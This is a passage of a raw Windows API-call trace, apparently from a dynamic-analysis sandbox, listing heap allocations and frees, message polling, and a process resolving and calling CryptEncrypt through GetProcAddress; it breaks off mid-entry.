[0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0189.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.596] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0189.596] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.596] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.596] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.597] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0189.597] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0189.597] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.598] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.598] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0189.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0189.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0189.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0189.599] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0189.599] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0189.600] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x106d7) returned 0x3bf0728 [0189.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.601] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x3bf0728 | out: hHeap=0x970000) returned 1 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.603] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0189.603] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0189.604] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.604] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0189.604] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.605] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0189.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e50a28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.606] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0189.606] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0189.607] CryptEncrypt (in: hKey=0xa87410, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x106d7, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x106d8) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0189.607] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0189.608] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56430 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0189.609] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.610] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0189.610] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.610] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: 